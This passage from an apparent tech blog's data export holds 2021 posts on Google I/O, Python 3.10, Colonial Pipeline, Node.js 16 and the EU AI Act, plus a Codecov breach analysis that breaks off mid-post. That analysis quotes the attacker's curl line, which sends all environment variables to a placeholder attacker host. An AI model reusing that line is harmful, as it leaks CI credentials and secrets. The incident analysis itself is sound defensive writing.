of the most serious attempts to close it. 
New features around data validation and model monitoring address the unglamorous but critical work of catching data drift and model degradation before they become business problems.\nThis is the kind of AI progress I care about. Training a model is maybe 20% of the work in a real ML system. The other 80% is data pipelines, monitoring, retraining, serving infrastructure, and all the boring plumbing that determines whether your ML project actually delivers value or becomes a failed experiment gathering dust.\nVertex AI: One Platform to Rule Them All # Google\u0026rsquo;s biggest announcement for ML practitioners was Vertex AI, a managed platform that consolidates their previously scattered ML services into a single unified offering. Previously, if you wanted to build ML on Google Cloud, you had to navigate AI Platform Training, AI Platform Prediction, AutoML, and several other services that had overlapping functionality and inconsistent interfaces.\nVertex AI promises a single API surface for the full ML workflow: data preparation, training (both custom and AutoML), hyperparameter tuning, deployment, monitoring, and feature management with a built-in feature store.\nI haven\u0026rsquo;t had extensive hands-on time yet, but the architecture looks sensible. The feature store integration is particularly interesting — feature stores have been one of those infrastructure components that every serious ML team needs but few have the resources to build properly. Having it integrated into the platform rather than being a separate service you have to wire up could meaningfully reduce the complexity of ML operations.\nThe competitive landscape here is clear: AWS has SageMaker, Azure has Azure ML, and now Google has Vertex AI. All three are converging on similar architectures, which suggests the industry is settling on a common understanding of what ML platforms need to look like. 
This platform consolidation pattern will accelerate over the next few years, with each cloud provider trying to make their AI services the default choice. That\u0026rsquo;s a good sign for standardization and portability, even if the vendor lock-in concerns remain real.\nLaMDA and the Language Model Race # I\u0026rsquo;d be remiss not to mention LaMDA (Language Model for Dialogue Applications), Google\u0026rsquo;s conversational AI system. The demo was impressive — the model held coherent, contextual conversations while role-playing as Pluto and a paper airplane, drawing on factual knowledge while maintaining character.\nBut I want to temper the excitement with some engineering pragmatism. These large language models are extraordinary at generating plausible, fluent text. They\u0026rsquo;re still not reliable for factual accuracy, they still hallucinate confidently, and they still require enormous computational resources to run. The journey from research demo to production deployment would accelerate dramatically when ChatGPT landed in late 2022. Google showed a polished demo, but the path from \u0026ldquo;impressive demo\u0026rdquo; to \u0026ldquo;product you can actually deploy and trust\u0026rdquo; is long and expensive.\nWhat\u0026rsquo;s more interesting to me is how Google plans to make these capabilities available to developers. The keynote hinted at future APIs but was light on specifics. If Google can offer LaMDA-like capabilities through a practical, affordable API — similar to what OpenAI is doing with GPT-3 — that would be genuinely transformative for application developers. But we\u0026rsquo;re not there yet, and promises made at I/O have a mixed track record of materializing.\nAndroid 12 and On-Device ML # The Android 12 preview showed continued investment in on-device machine learning. 
The new ML-backed features — smarter auto-rotate using face detection, improved speech recognition, better smart reply — all run on-device, which matters enormously for both privacy and latency.\nFor Android developers, the expansion of ML Kit and the improvements to the NNAPI (Neural Networks API) lower the barrier to incorporating on-device ML into apps. The trend is clearly toward making ML a standard tool in mobile development rather than a specialist capability.\nThis aligns with a broader industry direction: pushing ML inference to the edge rather than always requiring a round-trip to the cloud. Between Google\u0026rsquo;s on-device push, Apple\u0026rsquo;s Core ML improvements, and the growing ecosystem of edge ML frameworks, we\u0026rsquo;re approaching a world where basic ML capabilities are as standard in mobile apps as networking or local storage.\nMy Take # Google I/O 2021 felt like a maturation point for AI in the developer ecosystem. The flashy demos will get the headlines, but the substantive announcements — Vertex AI consolidating the ML platform, TensorFlow Decision Forests acknowledging that not everything needs deep learning, improved production ML tooling — these are the things that will actually change how developers work.\nI\u0026rsquo;ve been building systems that incorporate ML components for several years now, and the single biggest challenge has never been model accuracy. It\u0026rsquo;s been operational complexity. Every tool that reduces the gap between \u0026ldquo;works on my laptop\u0026rdquo; and \u0026ldquo;runs reliably in production\u0026rdquo; is worth paying attention to, and Google clearly understands that the next battleground in cloud AI isn\u0026rsquo;t model performance — it\u0026rsquo;s developer experience and operational simplicity.\nThe question, as always with Google, is follow-through. They have a habit of launching services with fanfare and then quietly deprecating them two years later. 
If Vertex AI is still a priority in 2023, I\u0026rsquo;ll be impressed. For now, I\u0026rsquo;m cautiously optimistic that we\u0026rsquo;re entering an era where ML tooling finally catches up to the promise of the underlying technology.\n","date":"20 May 2021","externalUrl":null,"permalink":"/posts/210520-google-io-2021-ai-ml-advances/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google I/O 2021 showcased AI advances that prioritize practical developer tooling over flashy demos — a shift that signals real maturity in the field.","title":"Google I/O 2021 — AI Gets Practical, and That's What Matters","type":"posts"},{"content":"Python 3.10 beta 1 dropped on May 3rd, and while there are several nice improvements in this release, one feature dominates the conversation: structural pattern matching. Implemented through PEP 634, 635, and 636, this is arguably the most significant syntax addition to Python since async/await landed in 3.5. Following on from Python 3.9\u0026rsquo;s improvements, this release continues Python\u0026rsquo;s steady march toward more expressive syntax. Having spent the past week experimenting with it, I have thoughts — mostly positive, with some caveats.\nMore Than a Switch Statement # The immediate reaction from many developers has been \u0026ldquo;Python finally gets a switch statement.\u0026rdquo; That\u0026rsquo;s technically true but dramatically undersells what structural pattern matching actually is. If you\u0026rsquo;ve used pattern matching in Rust, Scala, or Elixir, you\u0026rsquo;ll recognize the power here. If you haven\u0026rsquo;t, prepare to rethink how you handle complex conditional logic.\nThe basic syntax uses match and case:\ndef handle_command(command): match command: case \u0026#34;quit\u0026#34;: return shutdown() case \u0026#34;status\u0026#34;: return get_status() case other: return f\u0026#34;Unknown command: {other}\u0026#34; That looks like a switch statement, sure. 
But the real power emerges when you start matching against structures:\ndef process_event(event): match event: case {\u0026#34;type\u0026#34;: \u0026#34;click\u0026#34;, \u0026#34;position\u0026#34;: (x, y)}: handle_click(x, y) case {\u0026#34;type\u0026#34;: \u0026#34;keypress\u0026#34;, \u0026#34;key\u0026#34;: str(k)} if len(k) == 1: handle_keypress(k) case {\u0026#34;type\u0026#34;: \u0026#34;resize\u0026#34;, \u0026#34;dimensions\u0026#34;: (w, h)} if w \u0026gt; 0 and h \u0026gt; 0: handle_resize(w, h) You\u0026rsquo;re destructuring dictionaries, binding variables, applying type checks, and adding guard clauses — all in a readable, declarative syntax. This is a fundamental improvement over chains of if/elif with nested dictionary access and type checking.\nWhere This Actually Shines # I\u0026rsquo;ve been refactoring some of my own code to use pattern matching, and the areas where it excels are clear.\nAPI response handling is the obvious one. If you work with REST APIs or message queues, you\u0026rsquo;re constantly writing code that inspects the shape of incoming data and branches accordingly. Pattern matching makes this dramatically cleaner:\nmatch response.json(): case {\u0026#34;status\u0026#34;: \u0026#34;ok\u0026#34;, \u0026#34;data\u0026#34;: {\u0026#34;users\u0026#34;: [first, *rest]}}: process_user(first) queue_remaining(rest) case {\u0026#34;status\u0026#34;: \u0026#34;error\u0026#34;, \u0026#34;code\u0026#34;: 429, \u0026#34;retry_after\u0026#34;: seconds}: schedule_retry(seconds) case {\u0026#34;status\u0026#34;: \u0026#34;error\u0026#34;, \u0026#34;code\u0026#34;: code, \u0026#34;message\u0026#34;: msg}: log_error(code, msg) AST processing and compiler work benefits enormously. If you\u0026rsquo;re writing linters, code transformers, or DSL interpreters — all increasingly common in the Python ecosystem — pattern matching is a natural fit.\nState machine implementations become more readable too. 
Instead of sprawling if/elif chains checking current state and input combinations, you match on tuples of (state, event) and the code reads almost like a state transition table.\nThe Controversy: Is This Pythonic? # Not everyone is happy. The discussion around PEPs 634-636 was one of the most heated in recent Python governance history. Critics argue that pattern matching adds significant complexity to the language for a feature that experienced Python developers have been working without for 30 years. The match and case keywords are \u0026ldquo;soft keywords\u0026rdquo; — they\u0026rsquo;re only treated as keywords in the context of a match statement, which means existing code using match or case as variable names won\u0026rsquo;t break, but it does add complexity to the parser and cognitive overhead for developers reading code.\nThere\u0026rsquo;s also the learning curve concern. Python\u0026rsquo;s strength has always been its readability and gentle learning curve. Structural pattern matching, especially with guard clauses, class patterns, and nested destructuring, introduces concepts that are genuinely advanced. A newcomer encountering case Point(x, y) if x \u0026gt; 0: for the first time has a lot to unpack.\nI understand these concerns, but I think they\u0026rsquo;re outweighed by the benefits. Python has grown beyond its scripting roots. It\u0026rsquo;s now a dominant language in data science, web backends, DevOps tooling, and increasingly in systems programming. The developers using Python today need these kinds of expressive constructs, and the alternative — convoluted if/elif chains with isinstance checks — isn\u0026rsquo;t exactly a paragon of readability either.\nPerformance Considerations # One question I haven\u0026rsquo;t seen adequately addressed yet is performance. The beta implementation compiles match statements to a sequence of checks, similar to how the equivalent if/elif chain would work. 
There\u0026rsquo;s no jump table optimization for simple value matching, at least not yet.\nFor most use cases, this doesn\u0026rsquo;t matter — you\u0026rsquo;re typically matching against a handful of cases, not thousands. But it\u0026rsquo;s worth noting that pattern matching is primarily a readability and expressiveness feature, not a performance one. If you\u0026rsquo;re expecting C-style switch statement performance with computed gotos, you\u0026rsquo;ll be disappointed.\nThe CPython team may optimize this in future releases, but for now, treat it as syntactic improvement rather than a performance tool.\nMy Take # After a week of experimentation, I\u0026rsquo;m genuinely excited about structural pattern matching in Python. It\u0026rsquo;s the kind of feature that, once you start using it, makes you wonder how you wrote certain kinds of code without it. The API response handling pattern alone will save me dozens of lines of awkward nested dictionary access in several active projects. This represents Python\u0026rsquo;s evolution from a simple scripting language into a sophisticated systems language.\nThat said, I\u0026rsquo;d caution against the temptation to use it everywhere. Not every conditional needs pattern matching. A simple if x \u0026gt; 10 doesn\u0026rsquo;t become better as match x: case n if n \u0026gt; 10:. Use it where you\u0026rsquo;re genuinely matching against structure — destructuring data, handling multiple message types, implementing state machines. That\u0026rsquo;s where it shines.\nPython 3.10 final is expected in October. Between now and then, the beta period is exactly the right time to experiment and provide feedback. 
If you maintain a library, start testing against 3.10 now — not for pattern matching compatibility, but because several other changes around type hints, error messages, and deprecations might affect your code.\nThe language keeps evolving, and this time, it\u0026rsquo;s evolving in a direction I\u0026rsquo;m genuinely enthusiastic about.\n","date":"13 May 2021","externalUrl":null,"permalink":"/posts/210513-python-310-structural-pattern-matching/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python 3.10’s first beta introduces structural pattern matching — the most significant syntax addition since async/await, and it’s worth understanding deeply.","title":"Python 3.10 Beta 1 — Structural Pattern Matching Changes Everything","type":"posts"},{"content":"Last Friday, Colonial Pipeline — the company responsible for nearly half the fuel supply to the US East Coast — confirmed it had been hit by a ransomware attack. The company shut down its entire pipeline system, roughly 5,500 miles of infrastructure, as a precaution. As I write this, the pipeline remains offline, and the implications are still unfolding. But the technical lessons are already clear, and they should concern every engineer working on systems that touch the physical world.\nThe Attack Vector: DarkSide and Double Extortion # The attack has been attributed to DarkSide, a ransomware-as-a-service (RaaS) operation that\u0026rsquo;s been active since mid-2020. What makes DarkSide particularly insidious is its \u0026ldquo;double extortion\u0026rdquo; model: they don\u0026rsquo;t just encrypt your data, they exfiltrate it first and threaten to publish it if you don\u0026rsquo;t pay.\nFrom what\u0026rsquo;s been reported so far, the attack targeted Colonial\u0026rsquo;s IT systems — the business side — rather than the operational technology (OT) systems that directly control the pipeline. 
But here\u0026rsquo;s the critical detail: Colonial shut down the OT systems preemptively because they couldn\u0026rsquo;t be confident the attackers hadn\u0026rsquo;t moved laterally into those networks.\nThis is the nightmare scenario that industrial control system (ICS) security professionals have been warning about for years. The convergence of IT and OT networks creates attack surfaces that didn\u0026rsquo;t exist a decade ago. When your business systems and your control systems share any connectivity whatsoever, compromising one puts the other at risk. The trend of supply chain compromise affecting critical infrastructure has evolved from IT software to operational technology.\nThe Air Gap Myth # I\u0026rsquo;ve spent years working on systems where the assumption was \u0026ldquo;our critical infrastructure is air-gapped.\u0026rdquo; In my experience, true air gaps are extraordinarily rare in practice. What most organizations have is a belief in an air gap, supported by a network diagram drawn five years ago that no longer reflects reality.\nThe truth is that modern industrial systems need data flowing between OT and IT layers for monitoring, analytics, and optimization. Someone eventually connects a historian server. Someone sets up remote access for a vendor. Someone plugs in a USB drive to update firmware. Each of these is a bridge across the supposed gap.\nColonial Pipeline reportedly had some level of network segmentation between IT and OT, but the fact that they couldn\u0026rsquo;t confidently say \u0026ldquo;no, the attackers can\u0026rsquo;t reach our pipeline controls\u0026rdquo; tells you everything about how effective that segmentation actually was.\nFor those of us building and maintaining systems: network segmentation isn\u0026rsquo;t a one-time architecture decision. It\u0026rsquo;s an ongoing operational discipline that needs continuous verification. Tools like Shodan regularly find industrial control systems exposed directly to the internet. 
If external researchers can find them, so can DarkSide.\nRansomware as a Supply Chain Problem # What strikes me about this incident is the scale of the downstream impact. Colonial Pipeline is a single company, but its shutdown affects fuel distribution across the entire eastern United States. Gas stations are running dry. Airlines are scrambling for fuel. And it\u0026rsquo;s all because of one compromised organization. We\u0026rsquo;ve seen this pattern before — SolarWinds showed us how a single compromised vendor can have cascading effects, and Codecov demonstrated it with developer tools.\nThis is a supply chain problem in the most literal sense. We\u0026rsquo;ve spent the last year talking about software supply chain security — SolarWinds, Codecov, dependency confusion attacks — but Colonial Pipeline reminds us that physical supply chains have the same single-point-of-failure vulnerabilities.\nAs engineers, we need to think about this from both directions. If you\u0026rsquo;re building systems for critical infrastructure, the security bar isn\u0026rsquo;t \u0026ldquo;good enough for a SaaS product.\u0026rdquo; You need defense in depth, you need incident response plans that assume breach, and you need the ability to operate in degraded mode rather than shutting everything down because you can\u0026rsquo;t verify what\u0026rsquo;s been compromised.\nIncident Response: The Hard Choices # Colonial\u0026rsquo;s decision to shut down the pipeline entirely is being second-guessed by some, but I think it was the right call given the information they had. 
When you can\u0026rsquo;t verify the integrity of your control systems, running a pipeline that carries highly flammable materials is an unacceptable risk.\nBut it exposes a massive gap in most organizations\u0026rsquo; incident response planning: what do you do when your IR plan says \u0026ldquo;isolate affected systems\u0026rdquo; but isolating those systems means shutting down critical national infrastructure?\nThis is where tabletop exercises earn their keep. Every organization running critical infrastructure should be running scenarios like this regularly. Not just \u0026ldquo;ransomware hits the file server\u0026rdquo; but \u0026ldquo;ransomware hits the business network and we can\u0026rsquo;t verify OT integrity.\u0026rdquo; The decisions you need to make in that scenario — who has authority to shut down operations, how do you communicate with customers and regulators, what\u0026rsquo;s your manual operations fallback — those decisions need to be made before you\u0026rsquo;re in the middle of a crisis. The lessons from CrowdStrike\u0026rsquo;s global outage and other systemic failures show that recovery planning needs to account for worst-case scenarios.\nMy Take # I\u0026rsquo;ve been in this industry long enough to have watched the IT/OT convergence happen in real time, and the Colonial Pipeline attack is, sadly, exactly the kind of incident many of us have been predicting. The uncomfortable reality is that our critical infrastructure was built in an era when \u0026ldquo;connected\u0026rdquo; meant something very different, and we\u0026rsquo;ve been bolting on connectivity faster than we\u0026rsquo;ve been bolting on security.\nThe DarkSide group has reportedly said they \u0026ldquo;didn\u0026rsquo;t intend to create problems for society\u0026rdquo; and only wanted money. That\u0026rsquo;s almost darkly funny — it shows how even the attackers didn\u0026rsquo;t fully grasp the cascading effects of what they were doing. 
When you attack infrastructure at this scale, intent is irrelevant; impact is everything.\nFor those of us in the developer and DevOps world, the takeaway is this: the systems we build don\u0026rsquo;t exist in isolation. That API you\u0026rsquo;re connecting to a SCADA system, that dashboard you\u0026rsquo;re building for pipeline monitoring, that cloud migration you\u0026rsquo;re planning for operational data — all of it is expanding the attack surface of systems that people depend on for basic necessities.\nSecurity isn\u0026rsquo;t someone else\u0026rsquo;s problem. It\u0026rsquo;s built into every architectural decision we make, every network connection we allow, and every assumption we fail to verify.\n","date":"6 May 2021","externalUrl":null,"permalink":"/posts/210506-colonial-pipeline-ransomware/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Colonial Pipeline ransomware attack exposes how deeply intertwined our digital infrastructure has become with physical systems we take for granted.","title":"Colonial Pipeline Ransomware — When Cybersecurity Meets Critical Infrastructure","type":"posts"},{"content":"Node.js 16 was released last week as the new Current release line, and while it doesn\u0026rsquo;t bring any single revolutionary feature, the collection of improvements adds up to a meaningful step forward. Following Node.js 14, this release continues the platform\u0026rsquo;s steady evolution. The release includes native Apple Silicon (M1) binaries for the first time, ships V8 9.0 with several new JavaScript language features, and stabilizes the Timers Promises API that makes working with timers in async code far more ergonomic.\nNode 16 will enter Long Term Support (LTS) in October 2021, making it the version most production environments will standardize on for the next couple of years. 
Here\u0026rsquo;s what\u0026rsquo;s worth paying attention to.\nNative Apple Silicon Support # For the growing number of developers who have switched to Apple\u0026rsquo;s M1 machines, Node.js 16 provides prebuilt binaries for the darwin-arm64 architecture. Previous versions could run on M1 through Rosetta 2 emulation, which worked but added overhead and occasional compatibility issues with native addons.\nThis matters more than it might seem. The M1\u0026rsquo;s performance advantage is significant — builds that took 30 seconds on an Intel MacBook Pro can finish in under 15 seconds on M1, but only if you\u0026rsquo;re running native code. Running Node through Rosetta 2 ate into that performance gain, and some native addon compilation workflows were fragile or broken entirely.\nI switched my primary development machine to an M1 MacBook Pro in February, and while the Rosetta experience was surprisingly good, there were enough paper cuts with native module compilation — particularly around node-gyp and modules that depend on architecture-specific binaries — that having official arm64 builds is a welcome relief. If you\u0026rsquo;re managing a team with mixed architectures, the official support also simplifies your CI matrix.\nV8 9.0 and New Language Features # Node.js 16 ships with V8 9.0, which brings several JavaScript features that have been working through the TC39 standards process. This pattern of language evolution mirrors what we\u0026rsquo;re seeing in TypeScript\u0026rsquo;s type system improvements:\nRegExp match indices (d flag) — When you use the new /d flag with a regular expression, the match object includes an indices property that tells you the start and end positions of each captured group. 
This is incredibly useful for syntax highlighting, code editors, and any application that needs to know where in the string a match occurred, not just what matched.\nconst match = /(hello) (world)/.exec(\u0026#39;say hello world\u0026#39;); // Standard match: [\u0026#39;hello world\u0026#39;, \u0026#39;hello\u0026#39;, \u0026#39;world\u0026#39;] const matchWithIndices = /(hello) (world)/d.exec(\u0026#39;say hello world\u0026#39;); // matchWithIndices.indices: [[4, 15], [4, 9], [10, 15]] Promise.any and AggregateError — Promise.any resolves with the first fulfilled promise (as opposed to Promise.race, which resolves with the first settled promise, whether fulfilled or rejected). If all promises reject, it throws an AggregateError containing all the rejection reasons. This is useful for patterns like trying multiple API endpoints and taking the first successful response.\nLogical assignment operators — \u0026amp;\u0026amp;=, ||=, and ??= combine logical operations with assignment. These have been available in recent V8 versions, but their presence in the Node 16 LTS line means they\u0026rsquo;re now safe to use in production code without transpilation.\n// Before user.name = user.name || \u0026#39;Anonymous\u0026#39;; // After user.name ||= \u0026#39;Anonymous\u0026#39;; // Nullish coalescing assignment config.timeout ??= 3000; // Only assigns if null or undefined The Timers Promises API # The most practically useful addition in Node 16, in my opinion, is the stabilization of the Timers Promises API (timers/promises). This module provides promise-based versions of setTimeout, setInterval, and setImmediate that work naturally with async/await. 
This represents the kind of ergonomic improvement that makes Node.js development more productive.\nBefore this API, using timers in async code required wrapping them in promises manually:\n// The old way function sleep(ms) { return new Promise(resolve =\u0026gt; setTimeout(resolve, ms)); } await sleep(1000); // Node 16 way import { setTimeout } from \u0026#39;timers/promises\u0026#39;; await setTimeout(1000); The setInterval version is even more compelling — it returns an async iterator, which means you can use for await...of to consume ticks:\nimport { setInterval } from \u0026#39;timers/promises\u0026#39;; for await (const _ of setInterval(1000)) { console.log(\u0026#39;tick\u0026#39;); // break when done } This is a small addition, but it eliminates one of those annoying friction points that every Node developer has encountered. I\u0026rsquo;ve probably written that sleep utility function in a hundred different projects. Having it in the standard library, with proper AbortController support for cancellation, is a quality-of-life improvement that I\u0026rsquo;ll immediately start using.\nWeb Crypto API (Experimental) # Node 16 also includes an experimental implementation of the Web Crypto API, accessible via crypto.webcrypto (the webcrypto export of the built-in crypto module) rather than as a browser-style global. This is part of the broader effort to align Node.js APIs with web platform standards, making it easier to write isomorphic code that runs in both Node and the browser.\nThe existing Node crypto module isn\u0026rsquo;t going anywhere, but having a standards-compliant Web Crypto API means that cryptographic code written for the browser can run in Node with minimal changes. For library authors who target both environments, this reduces the need for platform-specific code paths and bundler configurations.\nnpm 7 by Default # Node 16 ships with npm 7, which is now the default package manager. 
If you\u0026rsquo;ve been on Node 14 with npm 6, the upgrade brings several notable changes: automatic installation of peer dependencies, workspaces support for monorepos, and the new package-lock.json format (v2). The peer dependency change in particular can cause breakage on upgrade — packages that previously installed with only warnings may now fail if peer dependencies conflict. Run npm install in your projects after upgrading and resolve any conflicts before they surprise you in CI.\nMy Take # Node.js 16 is a solid, pragmatic release. It doesn\u0026rsquo;t try to reinvent the runtime — instead, it focuses on catching up with the JavaScript language, improving platform support, and polishing APIs that developers use daily. That\u0026rsquo;s exactly the right approach for a runtime that\u0026rsquo;s become critical infrastructure for a huge portion of the web.\nThe Apple Silicon support and V8 9.0 upgrades are expected evolutions, but the Timers Promises API is the kind of small improvement that disproportionately improves developer experience. It\u0026rsquo;s the difference between a runtime that can do async and one that\u0026rsquo;s designed for async at every level.\nIf you\u0026rsquo;re currently on Node 14 LTS, there\u0026rsquo;s no rush to upgrade production systems — Node 14 is supported until April 2023. But I\u0026rsquo;d recommend starting to test your applications against Node 16 now, particularly if you have native addons or rely on specific npm 6 behaviors. 
When Node 16 enters LTS in October, you\u0026rsquo;ll want to be ready for a smooth transition.\n","date":"29 April 2021","externalUrl":null,"permalink":"/posts/210429-nodejs-16-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Node.js 16 arrives with native Apple Silicon binaries, V8 9.0 bringing new JavaScript features, and the stabilization of the Timers Promises API that cleans up async timer patterns.","title":"Node.js 16 — Apple Silicon, V8 9.0, and the Timers Promise API","type":"posts"},{"content":"Yesterday, the European Commission published its proposal for the Artificial Intelligence Act — the first comprehensive legal framework for AI anywhere in the world. Like GDPR before it, this regulation is poised to have an impact far beyond Europe\u0026rsquo;s borders. If you build software that involves any form of machine learning or automated decision-making, this proposal deserves your attention.\nThe core approach is risk-based, categorizing AI systems into four tiers: unacceptable risk (banned), high risk (heavily regulated), limited risk (transparency obligations), and minimal risk (largely unregulated). It\u0026rsquo;s a pragmatic structure, but the details of what falls into each category — and the obligations attached — are where things get interesting for engineering teams.\nThe Risk Pyramid # At the top of the pyramid, certain AI applications are outright prohibited. These include social scoring systems by governments, real-time remote biometric identification in public spaces (with narrow exceptions for law enforcement), and AI systems that exploit vulnerable groups or use subliminal manipulation. The social scoring ban is clearly aimed at preventing European versions of China\u0026rsquo;s social credit system. 
The broader movement toward AI regulation reflects growing concerns about uncontrolled AI deployment.\nThe \u0026ldquo;high-risk\u0026rdquo; category is where most of the regulatory weight sits, and it\u0026rsquo;s broader than you might expect. It includes AI systems used in:\nCritical infrastructure (transport, energy, water) Education (student scoring, admissions) Employment (CV screening, interview evaluation, task allocation) Essential services (credit scoring, insurance pricing) Law enforcement (risk assessment, evidence evaluation) Migration and border control (visa processing, risk assessment) Justice and democratic processes (legal research tools, election systems) If your AI system falls into any of these categories, you\u0026rsquo;re looking at mandatory requirements for risk management systems, data governance, technical documentation, record-keeping, transparency, human oversight, and robustness. That\u0026rsquo;s a significant compliance burden, and it applies before you can place the system on the EU market.\nWhat This Means for Engineering Teams # The technical requirements for high-risk AI systems are surprisingly specific for a piece of legislation. Article 10 mandates that training, validation, and testing datasets must be \u0026ldquo;relevant, representative, free of errors and complete.\u0026rdquo; Anyone who has worked with real-world ML datasets just did a spit-take — but the intent is to push teams toward better data practices, even if perfection is unrealistic.\nArticle 11 requires technical documentation that describes the development process, design specifications, and the general logic of the AI system. Article 12 mandates automatic logging of events for the system\u0026rsquo;s entire lifecycle — essentially requiring audit trails for model predictions in production.\nFor engineering teams, this translates to several concrete requirements. 
These governance and documentation requirements represent a shift toward accountability in AI development:\nModel documentation becomes mandatory. You\u0026rsquo;ll need to document your training data sources, preprocessing steps, model architecture choices, and evaluation metrics. If you\u0026rsquo;re already following MLOps best practices with tools like MLflow or DVC, you\u0026rsquo;re ahead of the curve. If your model training process is a Jupyter notebook on someone\u0026rsquo;s laptop, you have work to do.\nData lineage is no longer optional. The regulation requires that you can demonstrate the provenance and quality of your training data. This means implementing data versioning, tracking transformations, and maintaining records of data quality assessments. Tools like Great Expectations for data validation and DVC for data versioning become essential infrastructure.\nMonitoring and logging in production. High-risk AI systems must maintain logs that enable tracing of the system\u0026rsquo;s operation throughout its lifecycle. This goes beyond standard application logging — you need to capture inputs, outputs, and the reasoning chain of your AI system in a way that supports post-hoc analysis and auditing. The pattern of transparency and oversight mirrors broader concerns about AI safety and governance.\nHuman oversight mechanisms. The regulation requires that high-risk AI systems be designed to allow human oversight, including the ability to understand the system\u0026rsquo;s capabilities and limitations, to monitor operation, and to intervene or override. This pushes against fully autonomous decision-making and toward human-in-the-loop architectures.\nThe GDPR Parallel # If this regulatory structure feels familiar, it should. 
The AI Act follows the same playbook as GDPR: a European regulation with extraterritorial reach, a risk-based approach, significant fines for non-compliance (up to €30 million or 6% of global turnover), and a transition period before enforcement.\nThe GDPR parallel is instructive for predicting how the AI Act will play out. GDPR was initially dismissed by many tech companies as unenforceable or irrelevant to non-European businesses. That turned out to be wrong — GDPR reshaped global data practices because the cost of maintaining separate systems for EU and non-EU users exceeded the cost of simply complying everywhere.\nThe same dynamic is likely to play out with the AI Act. If you\u0026rsquo;re building AI systems that might be used by European customers — directly or through B2B relationships — you\u0026rsquo;ll likely end up complying with the AI Act regardless of where your company is based. The Brussels Effect is real.\nMy Take # I have mixed feelings about this proposal. On one hand, regulation of AI is necessary and overdue. We\u0026rsquo;ve seen enough examples of biased hiring algorithms, discriminatory credit scoring, and opaque automated decision-making to know that self-regulation isn\u0026rsquo;t working. The risk-based approach is sensible — not all AI needs the same level of oversight, and the regulation correctly leaves low-risk applications largely alone.\nOn the other hand, some of the technical requirements feel like they were written by people who understand AI in theory but haven\u0026rsquo;t shipped ML systems in production. The requirement for training data to be \u0026ldquo;free of errors and complete\u0026rdquo; is aspirational at best and impossible at worst. Real-world data is messy, and the art of machine learning is partly about building systems that perform well despite imperfect data.\nThe biggest concern I have is the pace of legislation versus the pace of technology. 
This proposal will likely take two to three years to become law, plus another transition period. By then, the AI landscape will look very different from today. The challenge for regulators is writing rules that are specific enough to be enforceable but flexible enough to remain relevant as the technology evolves.\nFor developers, my advice is straightforward: don\u0026rsquo;t wait for the final text. Start implementing good MLOps practices now — model documentation, data lineage tracking, production monitoring, and human oversight mechanisms. These aren\u0026rsquo;t just compliance requirements; they\u0026rsquo;re engineering best practices that will make your AI systems more reliable and trustworthy regardless of what the regulation ultimately says.\n","date":"22 April 2021","externalUrl":null,"permalink":"/posts/210422-eu-ai-act-proposal/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The European Commission has proposed the AI Act, the world’s first comprehensive regulatory framework for artificial intelligence. Here’s what developers and engineering teams need to know.","title":"The EU AI Act — What the First Major AI Regulation Means for Developers","type":"posts"},{"content":"Today, Codecov disclosed that their Bash Uploader script — the tool that thousands of organizations use to send code coverage data from their CI/CD pipelines — had been compromised since January 31st. For over two months, a modified version of the script was silently exfiltrating environment variables from CI environments to an attacker-controlled server. Those environment variables typically include API keys, tokens, and credentials for services like AWS, GitHub, and internal systems. This follows the pattern established by the SolarWinds breach, where developer tools become vectors for widespread compromise.\nThis is not a minor incident. 
This is one of the most significant supply chain attacks targeting the developer toolchain that we\u0026rsquo;ve seen to date. The developer tools ecosystem is clearly a high-value target for attackers.\nHow the Attack Worked # The attack was elegant in its simplicity. Codecov\u0026rsquo;s Bash Uploader is a shell script that customers download and execute in their CI pipelines — typically with a curl | bash pattern or by referencing a specific version. The attacker exploited an error in Codecov\u0026rsquo;s Docker image creation process to extract a credential that let them modify the script, adding a single line that posted all environment variables to an external server.\nThe modified line was something like:\ncurl -sm 0.5 -d \u0026#34;$(git remote -v)\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt; ENV $(env)\u0026#34; http://\u0026lt;attacker-ip\u0026gt;/upload/v2 That\u0026rsquo;s it. One line. $(env) dumps every environment variable in the current shell, and curl sends it off. In a CI environment, those variables typically include:\nCloud provider credentials (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY) GitHub/GitLab tokens (GITHUB_TOKEN, CI_JOB_TOKEN) Docker registry credentials Database connection strings Internal API keys Signing keys and certificates The script was downloaded directly from Codecov\u0026rsquo;s servers, so every organization running curl -s https://codecov.io/bash | bash in their CI pipeline was potentially affected. The compromised script had a different SHA-256 hash than the legitimate one, but how many organizations actually verify the hash of scripts they download in their CI pipelines? In my experience, almost none.\nThe Blast Radius # Codecov reports having over 29,000 customers. Not all of them use the Bash Uploader, but a significant portion do. The attacker had access to exfiltrated credentials for approximately two months (January 31 to April 1) before the breach was discovered. 
That\u0026rsquo;s every CI pipeline run in that window across thousands of organizations, each potentially leaking secrets.\nThe downstream impact is still being assessed. Twitch has already confirmed they were affected and are rotating credentials. HashiCorp disclosed that their GPG signing key was exposed. More organizations will follow as the investigation continues.\nThe federal investigation into this breach, reportedly involving the FBI, underscores the severity. This isn\u0026rsquo;t just a data breach — it\u0026rsquo;s a potential gateway to a cascading chain of compromises across the software industry. The cascading nature of these supply chain attacks is what makes them so dangerous.\nThe curl | bash Anti-Pattern # This incident reopens a debate that\u0026rsquo;s been simmering in the DevOps community for years: the curl | bash installation pattern. It\u0026rsquo;s ubiquitous. It\u0026rsquo;s convenient. And it\u0026rsquo;s fundamentally at odds with security.\nWhen you pipe a remote script directly into your shell, you are executing arbitrary code with the full privileges of the CI environment. You\u0026rsquo;re trusting that:\nThe remote server hasn\u0026rsquo;t been compromised The script hasn\u0026rsquo;t been modified in transit (HTTPS helps, but doesn\u0026rsquo;t protect against server compromise) The script will continue to be the same script tomorrow as it is today The server isn\u0026rsquo;t serving different content based on the User-Agent (detecting curl vs. browser) The first and third assumptions are exactly what failed with Codecov. The server was serving a modified script, and it did so for about two months before anyone noticed.\nThe alternative — downloading the script, verifying its hash or signature, committing it to your repository, and executing the local copy — is more work. 
